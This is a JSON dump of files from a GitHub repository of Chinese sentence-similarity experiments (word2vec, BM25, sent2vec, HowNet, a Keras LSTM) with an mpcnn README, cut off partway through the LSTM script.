2018-05-22T10:50:17
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5689594149589539, "alphanum_fraction": 0.585185170173645, "avg_line_length": 27.93877601623535, "blob_id": "63bfabb4aa5b09b3d949ef5e4cf268c0141ce2a0", "content_id": "9984027acd8b67f8cfacd02ec04b0dca15106798", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2909, "license_type": "no_license", "max_line_length": 87, "num_lines": 98, "path": "/gensim_sentence_similarity/gensim_sentence_similarity.py", "repo_name": "eric-seekas/sentence_similarity", "src_encoding": "UTF-8", "text": "# 基于gensim的n_similarity函数实现句子相似度计算\n\nimport pandas as pd\nimport numpy as np\nfrom gensim.models import Word2Vec\nimport time\nimport matplotlib.pyplot as plt\nimport json\n\nTEST_DATA_FILE = '/media/jlan/E/Projects/nlp/sentence_similarity/dataset/dataset.csv'\nEMBEDDING_FILE = '/media/jlan/E/Projects/nlp/sentence_similarity/dataset/w2v_model.bin'\ntest_file = '/media/jlan/E/Projects/nlp/crop_qa/data4/part/sim_qs_cut.json'\n\nmodel = Word2Vec.load(EMBEDDING_FILE)\n\ndef data_prepare(datafile):\n \"\"\"从文件中读取数据\"\"\"\n data = pd.read_csv(datafile)\n data = data.iloc[-3207:]\n sentences1 = data['sentence1'].values\n sentences2 = data['sentence2'].values\n labels = data['similarity'].values\n return sentences1, sentences2, labels\n\n\ndef sentence_most_similarity():\n data_dict = json.load(open(test_file, encoding='utf-8'))\n num_success = 0\n\n print(len(list(data_dict.keys())))\n\n for q in list(data_dict.keys()):\n predicts = []\n qs = list(data_dict.keys())\n qs.remove(q)\n\n for sent in qs:\n try:\n score = model.n_similarity(q.split(), sent.split())\n except Exception:\n score = 0\n # print('{}, {}, {}'.format(q, sent, score))\n predicts.append(score)\n\n print(predicts)\n\n max_inx = np.argmax(predicts, axis=0)\n sort_inx = np.argsort(predicts, axis=0)[::-1]\n print(sort_inx)\n print(max_inx)\n # for i in sort_inx[:10]:\n # print(\"t1: {}, t2: {}, score: {}\".\n # format(q, qs[i], predicts[i]))\n\n\n print('\\n' + q + ';' + qs[max_inx] + ';', predicts[max_inx])\n\n most_similarity_sentence = qs[max_inx]\n print('相似问题集:\\n', data_dict[q])\n print('预测结果:\\n', most_similarity_sentence)\n if most_similarity_sentence in data_dict[q]:\n print('预测正确')\n num_success += 1\n print('\\n')\n print(num_success)\n\n\ndef main():\n predicts = []\n sentences1, sentences2, labels = data_prepare(TEST_DATA_FILE)\n for sent1, sent2 in zip(sentences1, sentences2):\n try:\n score = model.n_similarity(sent1.split(), sent2.split())\n except Exception:\n score = 0\n print('{}, {}, {}'.format(sent1, sent2, score))\n predicts.append(score)\n\n print(labels)\n print(predicts)\n from sklearn.metrics import roc_curve, auc\n\n fpr, tpr, thresholds = roc_curve(labels, predicts)\n roc_auc = auc(fpr, tpr)\n plt.plot(fpr, tpr, 'b', label='AUC = %0.2f' % roc_auc)\n plt.plot([0, 1], [0, 1], 'r--')\n plt.xlim([0, 1])\n plt.ylim([0, 1])\n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n plt.show()\n\n\nif __name__ == '__main__':\n start = time.time()\n # main()\n sentence_most_similarity()\n print('run time: ', time.time() - start)" }, { "alpha_fraction": 0.7197604775428772, "alphanum_fraction": 0.7796407341957092, "avg_line_length": 56.58620834350586, "blob_id": "199fa6176f40601d41cfddb70cd4249afe9a0ee0", "content_id": "41961042c70245d44cc6f61415ee79303e1222a1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1670, "license_type": "permissive", "max_line_length": 304, "num_lines": 29, "path": "/mpcnn/README.md", "repo_name": "eric-seekas/sentence_similarity", "src_encoding": "UTF-8", "text": "# mpcnn\nTensorflow Implementation: Multi-Perspective Sentence Similarity Modeling with Convolutional Neural Networks\n\nThis project implement the network (slightly different) from the paper [Multi-Perspective Sentence Similarity Modeling with Convolutional Neural Networks](https://pdfs.semanticscholar.org/0f69/24633c56832b91836b69aedfd024681e427c.pdf?_ga=2.189917163.1125227972.1499913967-1950509983.1499913967)\n\n\n## Test\nTested on the training set of [Quora Question Pair](https://www.kaggle.com/c/quora-question-pairs/data)\n\n- word2vec word-embedding: 0.33621892 logloss\n- glove word-embedding: 0.3132183 logloss\n\n## Details/Problem\nAs the input of sentence has variable length, padding is usually used for creating tensor with same shape, which enables parallel computation and provides better computational locality. However, padding will affect the result of mean-pool and min-pool because there are lots of zeros added to the sample.\n\n- Mean pool:\n - Problem: direct use mean operation would include the padding zero\n - Solved by: sum(output of conv) / sentence_length_tensor\n- Min pool (not using in the code, to be improved):\n - Problem: min pool would always return zero due to padding zero\n - Not Exactly Same: use min(output_of_conv + min_mask)\n - Min_mask is 2d tensor. If t-th input is padding zero, then the t-th value of\n the mask is 1e7 (large value) such that the min pool value is less affected\n by padding sequence. (P.s. conv.layer using SAME padding method and\n the min pool value is not exact equal to that without padding\n sequence)\n\n## TO BE CONTINUED\n- extract and consolidate the code from the notebook into package\n" }, { "alpha_fraction": 0.5654281377792358, "alphanum_fraction": 0.6122778654098511, "avg_line_length": 16.714284896850586, "blob_id": "be5d4e860bd068c2fe69c1d3e75a132d3c2f5d21", "content_id": "0dc7755518c2ed9d1b240f6ada787436c7b6ead9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 623, "license_type": "no_license", "max_line_length": 56, "num_lines": 35, "path": "/sig_tan_relu.py", "repo_name": "eric-seekas/sentence_similarity", "src_encoding": "UTF-8", "text": "# !/usr/bin/python3\n\n# coding:utf8\n# @Author: Jlan\n# @Time: 18-4-8 上午10:35\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\ndef sigmod(x):\n return 1.0/(1.0+np.exp(-x))\n\ndef tanh(x):\n y = np.tanh(x)\n return y\n\ndef relu(x):\n y = x.copy()\n y[y<0]=0\n return y\n\nx = np.arange(-50.0,50.0,0.1)\ny_relu = relu(x)\ny_sigmod = sigmod(x)\ny_tanh = tanh(x)\n\nplt.plot(x,y_relu,c='r',label=\"Relu\",linestyle='--')\nplt.plot(x,y_sigmod,c='g',label=\"Sigmod\",linestyle='-.')\nplt.plot(x,y_tanh,c='b',label=\"Tanh\")\nplt.ylim([-1,4])\nplt.xlim([-4,4])\nplt.legend(loc=2)\nplt.savefig('sig_tan_relu.png')\nplt.show()" }, { "alpha_fraction": 0.5172771215438843, "alphanum_fraction": 0.527297854423523, "avg_line_length": 32.27586364746094, "blob_id": "6611b840d9e364e614452e4db07136e1523b10af", "content_id": "9489e1aec6f5e2f16f4816b7d051b0a9bef102d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3174, "license_type": "no_license", "max_line_length": 108, "num_lines": 87, "path": "/bm25/bm25.py", "repo_name": "eric-seekas/sentence_similarity", "src_encoding": "UTF-8", "text": "import os\nimport json\nimport math\nimport pandas as pd\nimport numpy as np\n\nDATA_DIR = '/media/jlan/E/Projects/nlp/crop_qa/data4'\nTRAIN_DATA_FILE = '/media/jlan/E/Projects/nlp/sentence_similarity/dataset/dataset.csv'\nTEST_FILE = os.path.join(DATA_DIR, '/media/jlan/E/Projects/nlp/sentence_similarity/dataset/test.txt') # 测试文件\n\n\ndef data_prepare(datafile):\n with open(datafile, 'r') as f:\n lines = [line.strip() for line in f.readlines()]\n return lines\n\nclass BM25(object):\n def __init__(self, docs):\n self.D = len(docs)\n self.avgdl = sum([len(doc) + 0.0 for doc in docs]) / self.D\n self.docs = docs\n self.f = [] # 列表的每一个元素是一个dict,dict存储着一个文档中每个词的出现次数\n self.df = {} # 存储每个词及出现了该词的文档数量\n self.idf = {} # 存储每个词的idf值\n self.k1 = 1.5\n self.b = 0.75\n self.init()\n\n def init(self):\n for doc in self.docs:\n tmp = {}\n for word in doc:\n tmp[word] = tmp.get(word, 0) + 1 # 存储每个文档中每个词的出现次数\n self.f.append(tmp)\n for k in tmp.keys():\n self.df[k] = self.df.get(k, 0) + 1\n for k, v in self.df.items():\n self.idf[k] = math.log(self.D - v + 0.5) - math.log(v + 0.5)\n\n def sim(self, doc, index):\n score = 0\n for word in doc:\n if word not in self.f[index]:\n continue\n d = len(self.docs[index])\n score += (self.idf[word] * self.f[index][word] * (self.k1 + 1)\n / (self.f[index][word] + self.k1 * (1 - self.b + self.b * d\n / self.avgdl)))\n return score\n\n def simall(self, doc):\n scores = []\n for index in range(self.D):\n score = self.sim(doc, index)\n scores.append(score)\n while True:\n most_sim_index = scores.index(max(scores))\n most_sim = self.docs[most_sim_index]\n if most_sim == doc:\n scores.remove(scores[most_sim_index])\n else:\n return most_sim\n\n\n def main(self):\n std_sim_dict = json.load(open(os.path.join(DATA_DIR, 'part/sim_qs_cut.json'), encoding='utf-8'))\n num_std_q = len(std_sim_dict) # 标准问题数量\n num_correct = 0 # 预测正确的数量\n\n for sentence in self.docs:\n print(sentence)\n most_sim = self.simall(sentence)\n print(most_sim)\n sims = std_sim_dict.get(sentence)\n print(sims)\n if sims: # 有的标准问题没有与之对应的相似问题\n if most_sim in sims: # 从相似问题预测出每一个标准问题中反向查找相似问题,如果找到该相似问题,则预测成功\n num_correct += 1\n print('num_correct:', num_correct)\n print('num_std_q:', num_std_q)\n print('accuracy: ', num_correct/num_std_q)\n\n\nif __name__ == '__main__':\n sentences = data_prepare(TEST_FILE)\n bm = BM25(sentences)\n bm.main()" }, { "alpha_fraction": 0.5252832174301147, "alphanum_fraction": 0.5369613170623779, "avg_line_length": 39.587677001953125, "blob_id": "66d6ac22159256e3b2501c3b5c62591bd924c39c", "content_id": "cc8ec0285ca5c9f62a107361f9308c698e08eb3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9311, "license_type": "no_license", "max_line_length": 124, "num_lines": 211, "path": "/dataset/sent2vec.py", "repo_name": "eric-seekas/sentence_similarity", "src_encoding": "UTF-8", "text": "import os\nimport subprocess\nimport jieba\nimport json\nfrom subprocess import call\n\n\nDATA_DIR = '/media/jlan/E/Projects/nlp/crop_qa/data4'\n# MODEL_DIR = os.path.join('/home/jlan/Projects/agri/crop_qa_web/app/sent2vec/model')\nGEN_MODEL_FILE = os.path.join(DATA_DIR, 'gen_rice_model.bin') # gensim生成的模型\n\nTRAIN_FILE = os.path.join(DATA_DIR, 'thu_train_file.txt')\n# TRAIN_FILE = '/home/jlan/Projects/nlp/数据集/thu_train_file.txt'\n# CORPORA = os.path.join(DATA_DIR, 'part/std_q_partial_cut.txt')\nCORPORA = os.path.join(DATA_DIR, 'part/sim_qs_cut.txt')\nCORPORA_DICT = os.path.join(DATA_DIR, 'qs.json')\n# TEST_FILE = os.path.join(DATA_DIR, 'part/sim_q_partial_cut.txt') # 测试文件\nTEST_FILE = os.path.join(DATA_DIR, 'part/test.txt') # 测试文件\n\n\n\nclass Sent2Vec:\n def __init__(self):\n self.fasttext = os.path.join(DATA_DIR, 'fasttext')\n self.model = os.path.join(DATA_DIR, 'rice_model.bin') # sen2vec生成的模型\n\n def train(self, input_file):\n # train_command = '{} sent2vec -input {} -output {} -minCount 8 -dim 700 -epoch 9 -lr 0.2 -wordNgrams 2 -loss ns ' \\\n # '-neg 10 -thread 20 -t 0.000005 -dropoutK 4 -minCountLabel 20 -bucket 4000000'\\\n # .format(self.fasttext, input_file, self.model)\n\n train_command = '{} sent2vec -input {} -output {}'.format(self.fasttext, input_file, self.model)\n print(train_command)\n call(train_command, shell=True)\n\n\n def cut_words(self, sentence):\n with open(os.path.join(DATA_DIR, 'stop_words.txt'), 'r') as f:\n stop_words = [word.strip() for word in f.readlines()if word.strip()]\n word_list = jieba.cut(sentence)\n word_list = [word.strip() for word in word_list if word.strip() and word.strip() not in stop_words]\n # word_list = [word.strip() for word in word_list if word.strip()] # 不去停用词\n return word_list\n\n\n def get_nnSent(self, corpora, test_file, k):\n \"\"\"\n 执行\"fasttext nnSent model.bin corpora.txt [k],找到相似句子\n \"\"\"\n test_command = '{} nnSent {} {} {} {}' \\\n .format(self.fasttext, self.model, corpora, test_file, k)\n result = subprocess.check_output(test_command, shell=True)\n result = result.decode('utf8')\n with open(os.path.join(DATA_DIR, 'part/result.txt'), 'w') as f:\n f.write(result)\n # result = result.split('\\n')[2:]\n # result = [i.split(',')[0].strip() for i in result if i.strip()]\n return result\n\n\n def nn_result_process(self, result):\n \"\"\"\n 通过nnSent初步配对相似问题和标准问题,后续再手动进一步处理\n :param result:\n :return:\n \"\"\"\n result = result.strip('\\nPre-computing sentence vectors... done.')\n result = result.split('\\n\\n')\n f = open(CORPORA_DICT, encoding='utf-8')\n q_dict = json.load(f)\n stan_sim = {}\n with open(os.path.join(DATA_DIR, 'stan_sim.txt'), 'w') as f:\n for res in result:\n qs = res.split('\\n')\n print(qs)\n stan_q = qs[0].strip()\n stan_q_o = q_dict.get(stan_q, '')\n stan_sim[stan_q_o] = []\n f.write(stan_q_o+'\\n')\n sim_qs = qs[2:] # qs[1]=qs[0]\n for sq in sim_qs:\n sqq, sqc = sq.split(',')\n sqq_o = q_dict.get(sqq.strip())\n if not sqq_o:\n print('sq:', sq)\n stan_sim[stan_q_o].append([sqq_o, sqc])\n f.write(sqq_o + '.....' + sqc + '\\n')\n f.write('\\n')\n with open(os.path.join(DATA_DIR, 'stan_sim.json'), 'w', encoding='utf8') as json_file:\n json_file.write(json.dumps(stan_sim, ensure_ascii=False, indent=2))\n\n\n def sim_qs_distinct(self):\n f = open(os.path.join(DATA_DIR, 'stan_sim.json'), encoding='utf-8')\n sim_qs_dict = json.load(f)\n sim_qs_dict2 = sim_qs_dict.copy()\n for q, simqs in sim_qs_dict.items():\n for sq in simqs[:5]:\n # del sim_qs_dict2[sq[0]]\n sim_qs_dict2.pop(sq[0], None)\n print(len(sim_qs_dict))\n print(len(sim_qs_dict2))\n with open(os.path.join(DATA_DIR, 'stan_sim_distinct.json'), 'w', encoding='utf8') as json_file:\n json_file.write(json.dumps(sim_qs_dict2, ensure_ascii=False, indent=2))\n with open(os.path.join(DATA_DIR, 'stan_sim_distinct.txt'), 'w') as f:\n for k,vs in sim_qs_dict2.items():\n f.write(k+'\\n')\n for v in vs:\n f.write(v[0]+'.......'+v[1]+'\\n')\n f.write('\\n\\n')\n\n\n def search(self, text):\n \"\"\"\n :param text: 从django后端传过来的\n :return: 与text最相似的问题\n \"\"\"\n word_list = self.cut_words(text)\n with open(TEST_FILE, 'w') as f:\n f.write(' '.join(word_list))\n result = self.get_nnSent(CORPORA, TEST_FILE, k=3)\n f = open(CORPORA_DICT, encoding='utf-8')\n q_dict = json.load(f)\n result_id = [q_dict.get(i) for i in result]\n return result, result_id\n\n\n def compute_precision(self, result, k):\n std_sim_dict = json.load(open(os.path.join(DATA_DIR, 'part/std_sim_partial_dict_cut.json'), encoding='utf-8'))\n num_std_q = len(std_sim_dict) # 标准问题数量\n num_sim_q = sum([len(i) for i in std_sim_dict.values()]) # 相似问题数量,一个标准问题可能对应多个相似问题\n num_correct = 0 # 预测正确的数量\n\n # 从get_nnSent函数生成的结果中读取,每k+1行为一个单元,第一行是相似问题,后k行是找出的最接近的k个标准问题\n with open(result, 'r') as f:\n lines = [line.strip() for line in f.readlines()[1:] if line.strip()]\n results_each = [lines[i:i+k+1] for i in range(0, len(lines), k+1)]\n num_sim_q2 = len(results_each)\n print('results_each', results_each)\n\n for result_each in results_each:\n sim_q = result_each[0] # 相似问题\n std_qs = [v.split(',')[0].strip() for v in result_each[1:]] # 预测出的标准问题\n # print('sim: ', sim_q)\n # print(std_qs)\n find = False\n # print('std_qs', std_qs)\n for j in range(k):\n sims = std_sim_dict.get(std_qs[j])\n if sims: # 有的标准问题没有与之对应的相似问题\n if sim_q in sims: # 从相似问题预测出每一个标准问题中反向查找相似问题,如果找到该相似问题,则预测成功\n num_correct += 1\n find = True\n # print('success predict std: ', std_qs)\n break\n if not find:\n print('sim: ', sim_q)\n print('failure predict std: ', std_qs)\n print('num_correct:', num_correct)\n print('num_std_q:', num_std_q)\n print('num_sim_q:', num_sim_q)\n print('num_sim_q2:', num_sim_q2)\n print('accuracy: ', num_correct/num_sim_q)\n\n\n def compute_precision2(self, result, k):\n std_sim_dict = json.load(open(os.path.join(DATA_DIR, 'part/sim_qs_cut.json'), encoding='utf-8'))\n num_std_q = len(std_sim_dict) # 标准问题数量\n num_sim_q = sum([len(i) for i in std_sim_dict.values()]) # 相似问题数量,一个标准问题可能对应多个相似问题\n num_correct = 0 # 预测正确的数量\n\n # 从get_nnSent函数生成的结果中读取,每k+1行为一个单元,第一行是相似问题,后k行是找出的最接近的k个标准问题\n with open(result, 'r') as f:\n lines = [line.strip() for line in f.readlines()[1:] if line.strip()]\n results_each = [lines[i:i+k+1] for i in range(0, len(lines), k+1)]\n num_std_q2 = len(results_each)\n\n for result_each in results_each:\n std_q = result_each[0] # 问题\n sim_qs = [v.split(',')[0].strip() for v in result_each[2:]] # 计算出的与之相似的问题\n find = False\n for j in range(k-1):\n sims = std_sim_dict.get(std_q)\n if sims: # 有的标准问题没有与之对应的相似问题\n if sim_qs[j] in sims: # 从相似问题预测出每一个标准问题中反向查找相似问题,如果找到该相似问题,则预测成功\n num_correct += 1\n find = True\n break\n if not find:\n print('std: ', std_q)\n print('predict sims: ', sim_qs)\n print('correct sims: ', sims)\n print('\\n')\n print('num_correct:', num_correct)\n print('num_std_q:', num_std_q)\n print('num_sim_q:', num_sim_q)\n print('num_std_q2:', num_std_q2)\n print('accuracy: ', num_correct/num_std_q2)\n\n\nif __name__ == '__main__':\n s2v = Sent2Vec()\n # s2v.train(TRAIN_FILE)\n k = 2\n\n result = s2v.get_nnSent(CORPORA, TEST_FILE, k)\n # s2v.nn_result_process(result)\n\n # sim_qs_distinct()\n\n s2v.compute_precision2(os.path.join(DATA_DIR, 'part/result.txt'), k)" }, { "alpha_fraction": 0.5550122261047363, "alphanum_fraction": 0.5727384090423584, "avg_line_length": 35.55307388305664, "blob_id": "002cde78d17a1e95255b5b67cb46a2245fa0e2cf", "content_id": "1b15bf300effd1bcab5de4cc997c52fcf69395c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7170, "license_type": "no_license", "max_line_length": 112, "num_lines": 179, "path": "/gensim_sentence_similarity/gen_sen2vec.py", "repo_name": "eric-seekas/sentence_similarity", "src_encoding": "UTF-8", "text": "# 首先使用word2vec对句子中的词语向量化,然后加和求平均作为句子向量,最后计算句子相似度\n\nimport os\nimport jieba\nimport json\nimport numpy as np\nfrom functools import reduce\nfrom gensim.models import Word2Vec\n\n\nDATA_DIR = os.path.join('/media/jlan/E/Projects/nlp/crop_qa/data4')\n# MODEL_DIR = os.path.join('/home/jlan/Projects/agri/crop_qa_web/app/sent2vec/model')\nGEN_MODEL_FILE = os.path.join(DATA_DIR, 'gen_thu_rice_model.bin') # gensim生成的模型\nAGRI_WORDS = os.path.join(DATA_DIR, 'agri_words.txt') # 农业领域词典\n\nTRAIN_FILE = os.path.join(DATA_DIR, 'train.txt')\n# TRAIN_FILE = '/home/jlan/Projects/nlp/数据集/thu_train_file.txt'\nCORPORA = os.path.join(DATA_DIR, 'part/test.txt')\nCORPORA_DICT = os.path.join(DATA_DIR, 'qs.json')\nTEST_FILE = os.path.join(DATA_DIR, 'part/test.txt') # 测试文件\n\n# jieba.load_userdict(AGRI_WORDS)\n\nclass MySentences(object):\n def __init__(self, filename):\n self.filename = filename\n\n def __iter__(self):\n for line in open(self.filename, encoding='utf8', errors='ignore'):\n yield line.split()\n\n\nclass GenS2V:\n def __init__(self):\n # self.model = Word2Vec.load(GEN_MODEL_FILE)\n pass\n\n def train(self):\n sentences = MySentences('/media/jlan/E/Projects/nlp/数据集/thu_rice.txt') # a memory-friendly iterator\n model = Word2Vec(sentences, size=100, window=5, min_count=5, workers=4)\n model.save(GEN_MODEL_FILE)\n return model\n\n def cut_words(self, sentence):\n with open(os.path.join(DATA_DIR, 'stop_words2.txt'), 'r') as f:\n stop_words = [word.strip() for word in f.readlines() if word.strip()]\n word_list = jieba.cut(sentence)\n word_list = [word.strip() for word in word_list if word.strip() and word.strip() not in stop_words]\n # word_list = [word.strip() for word in word_list if word.strip()] # 不去停用词\n return word_list\n\n def s2v(self, word_list):\n \"\"\"\n :param sentence: 输入一个句子\n :return: 该句子的句向量\n 算法重点创新的地方\n \"\"\"\n # sent_vec = reduce(lambda x,y: np.add(x,y), [self.model.wv[word] for word in word_list])/len(word_list)\n result_vec = np.zeros(100)\n sent_len = len(word_list)\n for word in word_list:\n try:\n word_vec = self.model.wv[word]\n except Exception:\n sent_len -= 1\n else:\n result_vec += word_vec/np.linalg.norm(word_vec)\n sent_vec = result_vec/sent_len\n return sent_vec\n\n def compute_similarity(self, vec1, vec2):\n \"\"\"\n 计算两个向量的余弦值\n :param vec1:\n :param vec2:\n :return:\n \"\"\"\n num = np.dot(vec1,vec2) # 若为行向量则 A * B.T\n denom = np.linalg.norm(vec1) * np.linalg.norm(vec2)\n cos = num / denom # 余弦值\n # sim = 0.5 + 0.5 * cos # 归一化\n # print(cos)\n # print(sim)\n return cos\n\n def std_qs_vec(self, crop):\n with open(crop, 'r') as f:\n lines = f.readlines()\n words_vec_dict = {}\n for line in lines:\n line = line.strip()\n vec = self.s2v(line.split())\n words_vec_dict[line] = vec\n # with open(os.path.join(DATA_DIR, 'part/gen_words_vec_dict.json'), 'w', encoding='utf8') as json_file:\n # json_file.write(json.dumps(words_vec_dict, ensure_ascii=False, indent=2))\n return words_vec_dict\n\n def get_nn_sent(self, words_vec, words_vec_dict, k):\n \"\"\"\n 从words_vec_dict中找与words_vec最相似的前k个\n :param words_vec: 要找与其相似的句子的向量\n :param words_vec_dict: 存储了{句子: 句向量}\n :param k: 前k个最相似\n :return: 前k个最相似的句子和相似值\n \"\"\"\n similarity_sents = {}\n for q, v in words_vec_dict.items():\n cos = self.compute_similarity(words_vec, v)\n similarity_sents[q] = cos\n sorted_results = sorted(similarity_sents.items(), key=lambda item: item[1], reverse=True) # 按cos值对字典排序\n # print(sorted_results[:k])\n return sorted_results[1:k+1]\n\n def compute_precision(self, k=1):\n nn_sents_result = json.load(open(os.path.join(DATA_DIR, 'part/gen_nn_sents.json'), encoding='utf-8'))\n std_sim_dict = json.load(open(os.path.join(DATA_DIR, 'part/sim_qs_cut.json'), encoding='utf-8'))\n num_std_q = len(nn_sents_result) # 相似问题数量,一个标准问题可能对应多个相似问题\n num_correct = 0 # 预测正确的数量\n\n for std_q, sim_qs in nn_sents_result.items():\n find = False\n print(std_q)\n print(sim_qs)\n # print('std_qs', std_qs)\n sims = std_sim_dict.get(std_q)\n for sim_q in sim_qs[:k]:\n if sim_q[0].strip() in sims: # 从相似问题预测出每一个标准问题中反向查找相似问题,如果找到该相似问题,则预测成功\n num_correct += 1\n find = True\n # print('success predict std: ', std_qs)\n break\n if not find:\n print('std: ', std_q)\n print('predict sims: ', sim_qs)\n print('correct sims: ', sims)\n print('num_correct:', num_correct)\n print('num_sim_q:', num_std_q)\n print('accuracy: ', num_correct/num_std_q)\n return num_correct/num_std_q\n\n def main(self):\n sents_vec_dict = self.std_qs_vec(CORPORA)\n # print(sents_vec_dict)\n # f = open(CORPORA_DICT, encoding='utf-8')\n # words_vec_dict = json.load(f)\n with open(TEST_FILE, 'r') as f1:\n lines = f1.readlines()\n nn_sents_result = {}\n for line in lines:\n line = line.strip()\n sent_vec = self.s2v(line.split())\n nn_sents = self.get_nn_sent(sent_vec, sents_vec_dict, 9)\n nn_sents_result[line] = nn_sents\n with open(os.path.join(DATA_DIR, 'part/gen_nn_sents.json'), 'w', encoding='utf8') as json_file:\n json_file.write(json.dumps(nn_sents_result, ensure_ascii=False, indent=2))\n self.compute_precision()\n\n\n\nif __name__ == '__main__':\n gs2v = GenS2V()\n gs2v.train()\n # sent1 = '编写史记的人受到了什么处罚'\n # sent2 = '司马迁收到了什么刑罚'\n # words1 = gs2v.cut_words(sent1)\n # words2 = gs2v.cut_words(sent2)\n # vec1 = gs2v.s2v(words1)\n # vec2 = gs2v.s2v(words2)\n # gs2v.compute_similarity(vec1, vec2)\n # sents_vec_dict = gs2v.std_qs_vec(CORPORA)\n # gs2v.get_nn_sent(words1, sents_vec_dict, 3)\n\n # gs2v.main()\n # gs2v.compute_precision(9)\n\n# sim: 稻鸭共作 鸭子 的 作用 是\n# failure predict std: [('水稻纹枯病 的 菌核 是 怎么 形成 的', 0.86038722664756473)]\n# sim: 水稻 已经 发生 稻曲病 用 什么 药物 防治 最佳\n# failure predict std: [('水稻 稻曲病 在 水稻 什么 时期 防治 最好', 0.86975828631826579)]\n\n" }, { "alpha_fraction": 0.538665235042572, "alphanum_fraction": 0.5990465879440308, "avg_line_length": 30.483333587646484, "blob_id": "f120fdedcef41c629f773ac53f8f0f2082c473d9", "content_id": "d51c190fe948a58fb64a83aae5aff37d3456207c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1916, "license_type": "no_license", "max_line_length": 170, "num_lines": 60, "path": "/hownet/similarity_hownet.py", "repo_name": "eric-seekas/sentence_similarity", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nfrom hownet import similar_sentence\nimport time\nimport matplotlib.pyplot as plt\n\nTRAIN_DATA_FILE = '/media/jlan/E/Projects/nlp/sentence_similarity/dataset/dataset.csv'\n\n\ndef data_prepare(datafile):\n data = pd.read_csv(datafile)\n data = data.iloc[-3207:]\n sentences1 = data['sentence1'].values\n sentences2 = data['sentence2'].values\n labels = data['similarity'].values\n return sentences1, sentences2, labels\n\n\ndef main():\n predicts = []\n sentences1, sentences2, labels = data_prepare(TRAIN_DATA_FILE)\n for sent1, sent2 in zip(sentences1, sentences2):\n score = similar_sentence(sent1.split(), sent2.split())\n print('{}, {}, {}'.format(sent1, sent2, score))\n predicts.append(score)\n\n from sklearn.metrics import roc_curve, auc\n fpr, tpr, thresholds = roc_curve(labels, predicts)\n roc_auc = auc(fpr, tpr)\n plt.plot(fpr, tpr, 'b', label='AUC = %0.2f' % roc_auc)\n plt.plot([0, 1], [0, 1], 'r--')\n plt.xlim([0, 1])\n plt.ylim([0, 1])\n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n plt.show()\n print(predicts)\n\n # thresholds = [i / 100 for i in range(10, 90)]\n # # thresholds = [0.65, 0.66, 0.67, 0.68, 0.69, 0.7, 0.71, 0.72, 0.73, 0.74, 0.75, 0.76, 0.77, 0.78, 0.79, 0.80, 0.81, 0.82, 0.83, 0.84, 0.85, 0.86, 0.87, 0.88, 0.89]\n # p = []\n # for thres in thresholds:\n # preds = [1 if p > thres else 0 for p in predicts]\n # preds = np.array(preds)\n # print(thres, sum(preds == labels))\n # p.append(sum(preds == labels))\n #\n # plt.plot(thresholds, p)\n # plt.title('各阈值下的准确率')\n # plt.ylabel('准确率 Accuracy')\n # plt.xlabel('阈值 Thresholds')\n # plt.show()\n # print(p)\n\n\nif __name__ == '__main__':\n start = time.time()\n for _ in range(1):\n main()\n print('run time: ', time.time()-start)" }, { "alpha_fraction": 0.6004503965377808, "alphanum_fraction": 0.6260673999786377, "avg_line_length": 35.24829864501953, "blob_id": "b3b7fe3db606f07fba7770dbe65f38869f6dd06c", "content_id": "7fb2dc652d64574fbbb0d88b17e2fd113a118d19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11097, "license_type": "no_license", "max_line_length": 109, "num_lines": 294, "path": "/lstm/lstm.py", "repo_name": "eric-seekas/sentence_similarity", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\nimport os\nimport pickle\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom gensim.models import Word2Vec\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom keras.layers import Dense, Input, LSTM, Embedding, Dropout\nfrom keras.layers.merge import concatenate\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.models import Model, load_model\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.preprocessing.text import Tokenizer\nfrom sklearn.metrics import roc_curve, auc\nimport json\nfrom gen_how_scores import how_scores, gen_scores\n\n\nEMBEDDING_FILE = '/media/jlan/E/Projects/nlp/sentence_similarity/dataset/w2v_model.bin'\nTRAIN_DATA_FILE = '/media/jlan/E/Projects/nlp/sentence_similarity/dataset/dataset.csv'\ntest_file = '/media/jlan/E/Projects/nlp/sentence_similarity/dataset/sim_qs_cut.json'\n\nMAX_SEQUENCE_LENGTH = 30\nMAX_NB_WORDS = 200000\nEMBEDDING_DIM = 100\nVALIDATION_SPLIT = 0.1\nnum_lstm = 175\nnum_dense = 100\nrate_drop_lstm = 0.15\nrate_drop_dense = 0.15\nact = 'relu'\nre_weight = True # whether to re-weight classes to fit the 17.5% share in test set\nSTAMP = './model/w2v_sgd_b16'\nsave = True\nload_tokenizer = False\nsave_path = \"./model\"\ntokenizer_name = \"tokenizer.pkl\"\nembedding_matrix_path = \"./model/embedding_matrix.npy\"\n\n\ndef data_prepare(datafile):\n \"\"\"从文件中读取数据\"\"\"\n data = pd.read_csv(datafile)\n sentences1 = data['sentence1'].values\n sentences2 = data['sentence2'].values\n labels = data['similarity'].values\n return sentences1, sentences2, labels\n\n\ndef tokenize(sentences=None):\n \"\"\"获取所有文本中的词语\"\"\"\n if load_tokenizer:\n print('load tokenizer')\n tokenizer = pickle.load(open(os.path.join(save_path, tokenizer_name), 'rb'))\n else:\n tokenizer = Tokenizer(num_words=MAX_NB_WORDS, lower=False)\n tokenizer.fit_on_texts(sentences)\n if save:\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n pickle.dump(tokenizer, open(os.path.join(save_path, tokenizer_name), 